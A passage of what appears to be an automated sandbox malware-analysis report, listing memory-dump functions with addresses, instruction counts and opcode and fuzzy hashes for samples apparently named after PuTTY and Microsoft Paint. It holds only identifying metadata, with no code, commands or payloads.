                              Function 00007FFF60F4ACDC Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e98f78ab8cbc43e987729058ce5ba294ce246777409562f12b43ed1f1a363374
                              • Instruction ID: d521b5df24e76e9edd4bb4517ccadc1d0a31654d23f6b459d0af9c0ac87c8bf2
                              • Opcode Fuzzy Hash: e98f78ab8cbc43e987729058ce5ba294ce246777409562f12b43ed1f1a363374
                              • Instruction Fuzzy Hash: 56F03031E1891A8EE799F72844596BC67D2FF88301B9405B9DC0DEB3D7EE6D9C428740
                              Function 00007FFF60F41668 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7672c2613e62aebb02589c5a603b2bc472b1af59c38fb1c1e05ddaf1e18c221c
                              • Instruction ID: cda584b9694c66574f790ddacf34262fdcc182dfb5464938cf68220cb2119afa
                              • Opcode Fuzzy Hash: 7672c2613e62aebb02589c5a603b2bc472b1af59c38fb1c1e05ddaf1e18c221c
                              • Instruction Fuzzy Hash: F1F09042C1E86B8AF79032A8A4552A873C0FB153A0F6A08B0CE8CD73C3DD0C6DA103D9
                              Function 00007FFF60F42ABC Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4088c711a2aea0f9fecf31565caea2ee2a8df2fd16d6228646b4de08dfb607da
                              • Instruction ID: a040fad190c27d5c577530790eae1cec2a0465abeb4cc4c0d7bf82dd3b3765ac
                              • Opcode Fuzzy Hash: 4088c711a2aea0f9fecf31565caea2ee2a8df2fd16d6228646b4de08dfb607da
                              • Instruction Fuzzy Hash: A5F03030F18E0E4FD798DB78805927866E3FB94201F910A79D01ED37C2DF79A8518340
                              Function 00007FFF60F42ADF Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5bb2f4792db45aea3585011d21a87e36179a86aad62ce3d5a14b148063ce1e2b
                              • Instruction ID: c316b687127f6b151fa6ef02bd9ea4eb883f9d42c7e151b901e6b287cef38f67
                              • Opcode Fuzzy Hash: 5bb2f4792db45aea3585011d21a87e36179a86aad62ce3d5a14b148063ce1e2b
                              • Instruction Fuzzy Hash: BCF06D21F18A0B4FD798AB7890951A9A6E3FF94301B914AB4D00EC76CBDE3CED428340
                              Function 00007FFF60F480D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: d11390ed9e9782af254ebeb95b4531da61ce0616228e188bfe2b4faea08a6187
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 88E0ED10F1DC1E86AAA8615D68552BD12D1DBA5710FB80036DA0ED27C6EDAE5C4313D5
                              Function 00007FFF60F480E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 2425b603294472acd06000a582924992b739cdef462ec0455348ad355e620531
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: B1E0E511E1DC1B96AAA8212D68552BD22C1DB88B50F740536EC0DD23CAFE88AC8343D3
                              Function 00007FFF60F4C0F1 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fdd24a9c641ed91325fab2d4c72ccbafc4029f806b4d877d8efb8afe94b6f9bf
                              • Instruction ID: ebe4dcbeecc4555bc1aeaa2c10144dd680ad01dee437f18d8caa9db8af8fd965
                              • Opcode Fuzzy Hash: fdd24a9c641ed91325fab2d4c72ccbafc4029f806b4d877d8efb8afe94b6f9bf
                              • Instruction Fuzzy Hash: EFE09A2191C1A44FF7412254E4800F967E1EBDA320F2409B2DC08DB7D3CC0D65668388
                              Function 00007FFF60F4BC51 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc4f461484dd08a19eb88fa99db2d4519f3f9bc58de2aaa635c733ba73cf155f
                              • Instruction ID: 973fc2cfad0c534591f838e1640509f56450684ce7eb4b8376ccb94c959867e1
                              • Opcode Fuzzy Hash: fc4f461484dd08a19eb88fa99db2d4519f3f9bc58de2aaa635c733ba73cf155f
                              • Instruction Fuzzy Hash: E1E0921190C1928FE3215324A4D85FC77D2FF55320F6508B6D9489BAE3DD1D65465351
                              Function 00007FFF60F4234E Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 928ef50414c4e43f3c5fc3bec10e3c7555abf2914d377cd68b15f156f3639c02
                              • Instruction ID: 25ff26ec02eb6da28168730a53c29c55c5ade2021b862ee00ae5b3f975462252
                              • Opcode Fuzzy Hash: 928ef50414c4e43f3c5fc3bec10e3c7555abf2914d377cd68b15f156f3639c02
                              • Instruction Fuzzy Hash: 30F03A22F0C14381FFA02954E0401FA63D2AB91364FA90536D84DC73C79C2EADA24341
                              Function 00007FFF60F43810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7483e05eeb4b68dc7aaec5fe67d8693cd0fbea70cff8dfa139480dbb2c20f60
                              • Instruction ID: 06fdb16b3bffa5e12ea7966b35d7a8d2fe2c86aeeaa8d9f505cd27de4334a45f
                              • Opcode Fuzzy Hash: e7483e05eeb4b68dc7aaec5fe67d8693cd0fbea70cff8dfa139480dbb2c20f60
                              • Instruction Fuzzy Hash: 65E06D32E1C93A8AF698763891052F892C1EB48361F9908B7EC0DD33D2ED1E9D814380
                              Function 00007FFF60F4B8C0 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction ID: f8d0b0329e372fca53cda5da5cacf70b7e52d896491b033138c5715b75284ab0
                              • Opcode Fuzzy Hash: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction Fuzzy Hash: A3E06532A2D44A96BBF891294809A3A26C9DF90350F21193AEE0DC3397ED18A8064696
                              Function 00007FFF60F4865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3cefdc04a6342e4833fe842f6441cdfe45bba947b35cc5dde5d97374620f7b0
                              • Instruction ID: b92e42c555deacf6d0248fca25f305709ebd7c5826a08a5475acebfae2cec095
                              • Opcode Fuzzy Hash: f3cefdc04a6342e4833fe842f6441cdfe45bba947b35cc5dde5d97374620f7b0
                              • Instruction Fuzzy Hash: 2AF06D20E1D9079AFBA4A228C5A91BE12C1EF15345F744474DE0B833C7EE9CBC4283C6
                              Function 00007FFF60F4C9C1 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f8b869e0981df5228518f3a336135c9710198b989b16b96ef388243fc2219359
                              • Instruction ID: 7a9afa5d46328217ea436e68350c2f9ee909ce1c871683868f26bd6c7567bf2e
                              • Opcode Fuzzy Hash: f8b869e0981df5228518f3a336135c9710198b989b16b96ef388243fc2219359
                              • Instruction Fuzzy Hash: 10E0EC01B1CC8A9FE6C5A72840692BC57D3EFA9211B6800BAD90DC73A7EE585D525345
                              Function 00007FFF60F4CA0E Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0ccf38ab9a6a0d9ad09b7973e6e3246df90909cdff298ece2da8d1968479e359
                              • Instruction ID: 2fec578de8f476879cfff7936728c695970a43ea74156804b603534b17a0b797
                              • Opcode Fuzzy Hash: 0ccf38ab9a6a0d9ad09b7973e6e3246df90909cdff298ece2da8d1968479e359
                              • Instruction Fuzzy Hash: E1E01230F19D2E8FA2E5E32C401927952D2EBDC311BA441BA9C1DD33A6EC249C4147C0
                              Function 00007FFF60F4C28A Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: e983f7529db92728b86a85fdb7f2653036fc3744adf4343b8fc15571bd0ca1b6
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 8ED05B3160D50DCECF859BA494053FD77A0FF45315FA0547AD50AD51C2CE358498C7C0
                              Function 00007FFF60F4888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d05a19bf5aa1353b5aea5c39ac43eb5dc5b1cfaf4fa363f1f35316c7e52367b
                              • Instruction ID: fa88cb2cbbaddbabc0bb5568d89b6629e58f06cab5cc55cfc54d96d81f972325
                              • Opcode Fuzzy Hash: 6d05a19bf5aa1353b5aea5c39ac43eb5dc5b1cfaf4fa363f1f35316c7e52367b
                              • Instruction Fuzzy Hash: 07C0801171DC081B5740F11C549E77E63D2D7EC161728413AD40DC3365DC34D947C342
                              Function 00007FFF60F4860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d9260457d8ea45df17c4541a7428a42e8e2c178c25f30bb66bbb1774bb614243
                              • Instruction ID: ea41e4e71657050b6e90f100f84fce998d629039d9a367ed9769f48b3c43dc50
                              • Opcode Fuzzy Hash: d9260457d8ea45df17c4541a7428a42e8e2c178c25f30bb66bbb1774bb614243
                              • Instruction Fuzzy Hash: 52D0123164A31589E758373965111A862C1EF45255B9404B9E90DC43A2FD2EC5C14350
                              Function 00007FFF60F4C9FC Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07140fbf14d3c1ff971ba9b9e958fc770ad0ed846ac12f8de86831175eed6d55
                              • Instruction ID: d28db7e27d3c21b00e48738c44c2da68138a3ac7f298d90c9cc03171d1972f5a
                              • Opcode Fuzzy Hash: 07140fbf14d3c1ff971ba9b9e958fc770ad0ed846ac12f8de86831175eed6d55
                              • Instruction Fuzzy Hash: F5A00250B1580F1A63C4A12D041927941CBE7B9281B6440B7591DCA297ED155D410615

                              Executed Functions

                              Function 00007FFF60F29818 Relevance: .5, Instructions: 527COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3f703e3e297808c8f163ee1660a4a4585a19f8491ad36974d9b6d18cf45a5ca
                              • Instruction ID: 8528dab635e614c3fb16d1ab7caadc98a63256de5a4249d5092efea9b3161716
                              • Opcode Fuzzy Hash: a3f703e3e297808c8f163ee1660a4a4585a19f8491ad36974d9b6d18cf45a5ca
                              • Instruction Fuzzy Hash: 64F12866C1C64B8AFB19BBA488422F93BD0DF51320F6801BDD44AC7697FD1CB54B8792
                              Function 00007FFF60F2B8C0 Relevance: .4, Instructions: 416COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dba635349c9d1892001c3e36b4a687fcb174f2a43c573de1ede07bf6eaad9a93
                              • Instruction ID: daa0da1a4baa6d34576dc44a39a43dec666a427901afc7f25fbde66c65cbf910
                              • Opcode Fuzzy Hash: dba635349c9d1892001c3e36b4a687fcb174f2a43c573de1ede07bf6eaad9a93
                              • Instruction Fuzzy Hash: 6EC1C821D1D3878FF76692A499561B53BE0DF52311F7909B7CC89CB2D3DD0D284A8392
                              Function 00007FFF60F2C012 Relevance: .3, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1849e94f4d31198b98789f9ae95849cfcfed8e5a9acdc841bcf650c346aaaa8b
                              • Instruction ID: 22f78be3e4dda53ea6b332b507e78c264b40c026cbcb553264b54ea54a7cbba7
                              • Opcode Fuzzy Hash: 1849e94f4d31198b98789f9ae95849cfcfed8e5a9acdc841bcf650c346aaaa8b
                              • Instruction Fuzzy Hash: 1AB1D131D0D68BCAFB69D6E489562B97BD0EF15300F74097AC48DC72D3DD1CA80A82D2
                              Function 00007FFF60F22918 Relevance: .8, Instructions: 820COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d59a5aa8919665ca3131eebfa8419c991e73cdde1a4519210ab4fea4dac4b425
                              • Instruction ID: aca89359e4ecadeb61fe68dce0811e770bc32f732ff3600d65a17d2da4169217
                              • Opcode Fuzzy Hash: d59a5aa8919665ca3131eebfa8419c991e73cdde1a4519210ab4fea4dac4b425
                              • Instruction Fuzzy Hash: 73527C61F2C50B8BFB98A7A891956BD36D3EF94312FA10838E00DC77C6DE2DAC424745
                              Function 00007FFF60F22B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f226a4ff80468d0ff5d8fe404f14ec40108d577bc0da6098c615c1910a48c5b7
                              • Instruction ID: 5e4bc5dcc6833755fe86288155a0f5323a9a01a1a7113701c0e818f0e21aeab0
                              • Opcode Fuzzy Hash: f226a4ff80468d0ff5d8fe404f14ec40108d577bc0da6098c615c1910a48c5b7
                              • Instruction Fuzzy Hash: 29C13B21F2C5079AFB98A7B895956BD26D3EF98311FA50839E00DC77C6DE2EAC424704
                              Function 00007FFF60F23550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2f2327c70b960661ea51c7e6b2eeac78d6e92880506d55bccbd940f055239c34
                              • Instruction ID: bc51432904d72f9042ebb4038dc7ce2be26dca4ea0aef78f2d30c79fe64780c3
                              • Opcode Fuzzy Hash: 2f2327c70b960661ea51c7e6b2eeac78d6e92880506d55bccbd940f055239c34
                              • Instruction Fuzzy Hash: 1751C2B1C2C4678AF77812A8E6824F9ABC5EF55320FA50078DCAD837C7AC1C6C9641C2
                              Function 00007FFF60F28635 Relevance: .2, Instructions: 209COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1706e8605ae8c57387200d73106e0063287e4f6a7d896d94b0634673550cd6c7
                              • Instruction ID: 1b1dfa5dec9e8b91b3b52a0cbbff001b94c1c156e92d9bd53fe7264ac5181204
                              • Opcode Fuzzy Hash: 1706e8605ae8c57387200d73106e0063287e4f6a7d896d94b0634673550cd6c7
                              • Instruction Fuzzy Hash: 6F51F321A1E6878FF712A7B888952B53BD0DF56310F3806B6D549CB2D3ED4C6C4B8392
                              Function 00007FFF60F2456A Relevance: .2, Instructions: 191COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6ea561034f81cffd2db1f393238d4647cd8543bf81d8dfb2f2e7e4102a657c7a
                              • Instruction ID: 34953bc56c7a4ae35cca261c60add4d90d889573421cce462d098254c001f9fc
                              • Opcode Fuzzy Hash: 6ea561034f81cffd2db1f393238d4647cd8543bf81d8dfb2f2e7e4102a657c7a
                              • Instruction Fuzzy Hash: AF514C71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD00DE3252DF74A9858F81
                              Function 00007FFF60F26EC0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 333d53e005fee349b81dd2f0dfb59b8a4247e4bdc98a44f00261046a108cd5d5
                              • Instruction ID: 270a1667e659bdee03e0f429519174b47952ef0d6ecf79eb9c1a89b794a6d4be
                              • Opcode Fuzzy Hash: 333d53e005fee349b81dd2f0dfb59b8a4247e4bdc98a44f00261046a108cd5d5
                              • Instruction Fuzzy Hash: FE515030918A4E8FEBA8DF28D9557E977D1FF58300F14826EE84EC2395DF3499458B82
                              Function 00007FFF60F2457F Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a41b99f2c10362168ec935ff4fde55a68b5574bce3a72811e0dbb9331452545
                              • Instruction ID: 994ce6c64500802c83c9fb5cac26f5a0ff82d020a09dd0838c903694b3d346ad
                              • Opcode Fuzzy Hash: 2a41b99f2c10362168ec935ff4fde55a68b5574bce3a72811e0dbb9331452545
                              • Instruction Fuzzy Hash: F0514D31918A1C8FDB98DF58D845BE9BBF1FB58310F1082AAD00DE3251DF34A9858F81
                              Function 00007FFF60F2A530 Relevance: .2, Instructions: 175COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d9435bb17c4c4089af57c01ce66f126f2366dea2e7fabbfefb2d9e9da1884884
                              • Instruction ID: 97dece720e44097e7ca7a7075956a86ca481582cfcd285cc2e57b992d09cc1de
                              • Opcode Fuzzy Hash: d9435bb17c4c4089af57c01ce66f126f2366dea2e7fabbfefb2d9e9da1884884
                              • Instruction Fuzzy Hash: 0351F73190D68A8FD756E7A888565E67FF0EF4B224B1901FBD088CB1A3DE2C580BC351
                              Function 00007FFF60F22FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7bc862ec2fae94521f5fc6d3335c9b4a52a11b812ddbab7fb8f236f50c8fd80f
                              • Instruction ID: ecad1853d0086e68fd23a6c436d02b18da4221df6dee166d78a425a555043cba
                              • Opcode Fuzzy Hash: 7bc862ec2fae94521f5fc6d3335c9b4a52a11b812ddbab7fb8f236f50c8fd80f
                              • Instruction Fuzzy Hash: 1D518E61F1C40B87FB58B7A895966BD32C2EF94306FA00839E10DC33C6EE2DA9024746
                              Function 00007FFF60F222B5 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7335d77e82528ba6255daa2812edcdee4e2a94abd2f477e9a509ba84c24dc3a
                              • Instruction ID: 56112ef4d3144ef5abf9b4c6ba95a1ddb5fa3532d35f404954c5e71b04863f62
                              • Opcode Fuzzy Hash: a7335d77e82528ba6255daa2812edcdee4e2a94abd2f477e9a509ba84c24dc3a
                              • Instruction Fuzzy Hash: 6F514C32F2C147D6FBA4A6A8C2911FD23C2EFA5314F650539D94DC73C2DD2EAC664286
                              Function 00007FFF60F23540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31449763583faac2240cce2b411dd14bd9c282f5a9a067f2676da2277d25c1b0
                              • Instruction ID: c82f5a428091172de2f0931ffa97246b2faa3ae50d9e82c0b352225b97b9c8ce
                              • Opcode Fuzzy Hash: 31449763583faac2240cce2b411dd14bd9c282f5a9a067f2676da2277d25c1b0
                              • Instruction Fuzzy Hash: A1419261C2C5979AF37846A9F9C34F9B7C5EB45720F640079DCA982BC7AC1C68A641C3
                              Function 00007FFF60F2C6DF Relevance: .1, Instructions: 143COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
